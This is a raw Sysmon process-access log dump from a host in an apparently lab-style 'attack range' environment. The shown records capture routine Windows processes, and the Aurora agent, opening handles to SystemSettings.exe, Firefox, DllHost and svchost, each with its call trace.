Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.706{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d41c2|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.706{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.659{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ac576|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.659{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+54d13|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000042888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.654{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+129aec|C:\Windows\System32\TwinUI.dll+b5774|C:\Windows\System32\TwinUI.dll+b148b|C:\Windows\System32\TwinUI.dll+d178a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.654{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ac576|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.639{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ac576|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.638{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.560{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.560{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.560{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.560{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.447{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.447{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.446{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.446{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.446{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.446{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.446{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.445{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.445{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.445{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.437{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.437{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.437{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.432{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 